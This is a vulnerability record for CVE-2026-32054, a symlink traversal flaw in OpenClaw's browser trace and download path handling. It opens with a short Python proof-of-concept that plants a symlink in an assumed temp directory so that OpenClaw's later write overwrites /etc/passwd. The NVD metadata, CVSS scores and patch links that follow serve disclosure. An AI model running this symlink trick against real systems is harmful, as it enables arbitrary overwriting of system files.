CVE-2026-32054

#!/usr/bin/env python3 # PoC for CVE-2026-32054: OpenClaw Symlink Traversal # This script demonstrates how a local attacker can exploit the symlink vulnerability. import os import tempfile # Configuration # Assume OpenClaw uses a subdirectory in /tmp for processing temp_dir = tempfile.gettempdir() claw_temp_subdir = os.path.join(temp_dir, "openclaw_temp") malicious_link_name = "exploit_trace.log" target_file = "/etc/passwd" # Sensitive file to overwrite print(f"[*] Creating malicious symlink in {claw_temp_subdir}") # Ensure the directory exists (simulating preparation) if not os.path.exists(claw_temp_subdir): os.makedirs(claw_temp_subdir) link_path = os.path.join(claw_temp_subdir, malicious_link_name) # Create the symlink pointing to the target file try: os.symlink(target_file, link_path) print(f"[+] Symlink created: {link_path} -> {target_file}") except OSError as e: print(f"[-] Error creating symlink: {e}") print("[*] Wait for OpenClaw to process the trace/download...") print("[*] When OpenClaw writes to the temp file, /etc/passwd will be overwritten.")

{"cve": {"id": "CVE-2026-32054", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:08.703", "lastModified": "2026-03-24T21:11:08.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.25 contain a symlink traversal vulnerability in browser trace and download output path handling that allows local attackers to escape the managed temp root directory. An attacker with local access can create symlinks to route file writes outside the intended temp directory, enabling arbitrary file overwrite on the affected system."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.25 contienen una vulnerabilidad de recorrido de enlaces simbólicos en el manejo de rutas de salida de rastreo del navegador y descargas que permite a atacantes locales escapar del directorio raíz temporal gestionado. Un atacante con acceso local puede crear enlaces simbólicos para redirigir escrituras de archivos fuera del directorio temporal previsto, lo que permite la sobrescritura arbitraria de archivos en el sistema afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.25", "matchCriteriaId": "E7CAF2B9-46A9-45F0-8621-6485989E84AD"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/496a76c03ba85e15ea715e5a583e498ae04d36e3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-36h3-7c54-j27r", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-browser-trace-download-path-handling", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}